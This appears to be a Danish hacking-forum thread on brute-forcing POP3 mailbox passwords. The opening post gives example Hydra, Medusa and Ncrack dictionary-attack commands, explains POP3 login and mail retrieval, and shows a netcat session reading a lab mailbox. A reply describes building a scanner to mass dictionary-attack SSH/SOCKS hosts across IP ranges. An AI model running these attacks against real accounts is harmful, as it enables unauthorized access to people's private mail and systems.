Mål:
Målet er at få adgang til en mailbox. Enten for at læse mails i postkassen, eller måske for at kontrollere om brugeren har et dårligt password.

Der findes flere værktøjer til dette. Her under Ncrack, Medusa og Hydra. Nogle er bedre end andre. Min personlige erfaring siger mig, Ncrack klart er mest stabil og effektiv.
Jeg har utallige gange været ude for, at de andre crasher efter 15-20 minutter, eller at ikke alle de passwords der er i den password list man bruger, bliver testet. Dette resulterer i, koden ikke bliver fundet, selv om den er i passord listen.

Eksempler:

Citer:hydra -l <username> -P <password list> -v <target ip> -s 110 pop3
# hydra -l postmaster -P /usr/share/wordlists/password.lst -v <ip> -s 110 pop3

Citer:medusa -h <target ip> -u <username> -P <password list> -M pop3 -f
# medusa -h <ip> -u postmaster -P /usr/share/wordlists/password.lst -M pop3 -f

Citer:ncrack --user <username> -p pop3 -P <password list> <target ip>:110
# ncrack --user postmaster -p pop3 -P /usr/share/wordlists/password.lst --connection-limit 10 <ip>:110

Alternativt kan man selvfølgelig lave sit eget script. Der skal fatisk ikke så meget til.
Disse tre værktøjer har også yderligere options, man kan give. Enten for at være lidt mere aggresiv/diskret, eller for at få et dictionary attack til at gå lidt hurtigere. Man skal selvfølgelig huske, man også kan risikere at overbelaste serveren, man arbejder på. Man kan i nogle tilfælde også risikere at få spærret den eller de brugere, man arbejder på.

Lidt om POP3:
Når man skal logge ind på en POP3 server, starter man i "AUTHORIZATION" fasen, hvor brugeren identificerer sig selv:
Man sender først en USER kommando, som angiver brugernavnet, og så en PASS kommando, som angiver koden.
Serveren svarer så tilbage med "+OK ...", hvis kommandoen er i orden, eller "+ERR ..." hvis det ikke gik godt.

Citer:C: USER <brugernavn>
S: +OK/-ERR
C: PASS <kodeord>
S: +OK/-ERR

Hvis både USER og PASS kommandoen går godt, ryger man i "TRANSACTION" fasen.
Her kan man udføre flere forskellige kommandoer. De mest interessante kommandoer er nok LIST og RETR kommandoerne.
LIST viser en liste over mails for den postkasse man er i. RETR henter så en udvalgt mail.

Her er et eksempel. Jeg har klippet lidt af outputtet væk, for selve emailen er ikke så interessant i sig selv.

Citer:root@master:~# nc -nv 10.0.2.22 110
(UNKNOWN) [10.0.2.22] 110 (pop3) open
+OK POPFuzz v1.0 Server Ready (Shellsec.pw)
USER postmaster
+OK postmaster is hanging out here
PASS ********
+OK postmaster is now authorized
LIST
+OK 1 messages (1144 octets)
1 1144
.
RETR 1
+OK 1144 octets
Return-Path: <no-reply@example.com>
Delivered-To: postmaster@shellsec.pw
Received: from localhost (unknown [10.1.3.25])
by harmony.local (Postfix) with ESMTP id 2CC88637E2
for <postmaster@shellsec.pw>; Wed, 13 May 2015 10:02:52 +0200 (CEST)
To: postmaster@shellsec.pw
Subject: Hello
.......
--b1_5ecf0dd9b89ef5875fcc3e3ead24e962
Content-Type: text/plain; format=flowed; charset="UTF-8"
Content-Transfer-Encoding: 8bit

Hey
.......

--b1_5ecf0dd9b89ef5875fcc3e3ead24e962--
.
QUIT
+OK leaving
root@master:~#

Mere:
Der er en del information at hente i diverse POP3 RFCer.
Bemærk at nogle postservere forventer hele email adressen som brugernavn.

Links:
ncrack
Medusa
Hydra
https://tools.ietf.org/html/rfc1460
https://tools.ietf.org/html/rfc1725
https://tools.ietf.org/html/rfc1939
https://tools.ietf.org/html/rfc2449
Bemærk at der findes rigtig mange RFCer til POP3. Se efter de nyeste du kan finde.

Solid work!
Er iøvrigt enige med dig angående ncrack hvilket også er mit favorit tool til den slags.

(24-05-2015, 14:55)Spagnum Skrev: Solid work!
Er iøvrigt enige med dig angående ncrack hvilket også er mit favorit tool til den slags.

Jeg var slet ikke til Ncrack i starten. Men efter noget tid og efter problemer med de andre, valgte jeg at prøve Ncrack. Og jeg må sige.., det er sq et godt stykke software. :)

Er faktisk igang med at lave en scanner og et script til at lave dictionary angreb på ssh socks.
Scanneren bliver ip-by-ip + ip-ranges (alt efter hvor gode resultater man vil have, så det 2 optioner ).

Har leget lidt rundt med det her til aften med nogle sjove resultater:


Good - de virker!
Bad - de virker ikke...